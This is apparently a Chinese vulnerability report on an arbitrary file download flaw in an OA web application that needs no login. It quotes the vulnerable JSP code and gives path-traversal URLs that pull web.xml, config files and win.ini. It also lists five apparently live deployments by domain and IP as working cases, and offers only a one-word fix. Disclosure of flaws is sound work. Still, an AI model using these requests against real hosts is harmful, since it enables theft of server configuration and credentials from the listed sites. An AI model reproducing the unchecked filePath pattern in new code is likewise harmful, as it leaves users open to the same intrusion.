经测试发现,该系统存在任意文件下载,且无需登录
存在漏洞的文件:
/oa/admin/application/file_download.jsp?filePath=http://x.x.x.x:7890/oa/fileDownload.do?type=File&path=/../webapp/WEB-INF/web.xml
/../oaconsole/config/config.properties
c:\windows\win.ini
部分漏洞代码为:
<%&#64; page import&#61;"java.util.Calendar,org.springside.core.Constants,cn.firstsoft.firstframe.admin.Environment"%><%String logPath &#61; request.getParameter("filePath")&#61;&#61;null?"D:\\KingdeeOA\\Tomcat_5.5\\logs\\catalina.2007-12-29.log ":request.getParameter("filePath");String contentType &#61; request.getParameter("contentType")&#61;&#61;null?"application/x-download":request.getParameter("contentType");String fileName &#61; request.getParameter("fileName")&#61;&#61;null?"file.txt":request.getParameter("fileName");java.io.OutputStream ou &#61; null;java.io.InputStream is &#61; null;try{java.io.File logFile &#61; new java.io.File(logPath);if (logFile.exists()) {is &#61; new java.io.FileInputStream(logPath);byte[] content &#61; new byte[1024];int i &#61; 0;response.setContentType(contentType);ou &#61; response.getOutputStream();response.setHeader("Content-Disposition", "attachment; filename&#61;\""&#43;fileName&#43;"\"");while ((i &#61; is.read(content)) !&#61; -1) {ou.write(content, 0, i);}ou.flush(); } else {out.println("file not found:"&#43;logPath); }} catch (Exception e) {System.out.println(e);} finally {if (ou !&#61; null) ou.close();if (is !&#61; null) is.close();}%>
很明显的任意文件下载漏洞&#xff0c;随便在网上找一个实例进行证明
http://oa.xpngs.com/oa/admin/application/file_download.jsp?filePath&#61;c:\windows\win.ini
直接访问即可下载该文件了&#xff0c;保存的文件名为&#xff1a;file.txt
5个案例&#xff1a;
http://oa.xpngs.com/oa/themes/mskin/login/login.jsphttp://newoa.qingyitang.com:7890/oa/themes/mskin/login/login.jsphttp://wt.zhengtongauto.com/oa/themes/mskin/login/login.jsphttp://113.106.196.36:7890/oa/themes/mskin/login/login.jsp?login_error&#61;quithttp://www.jrxoa.com/oa/themes/mskin/login/login.jsp
漏洞证明&#xff1a;
下载的文件
修复方案&#xff1a;
过滤吧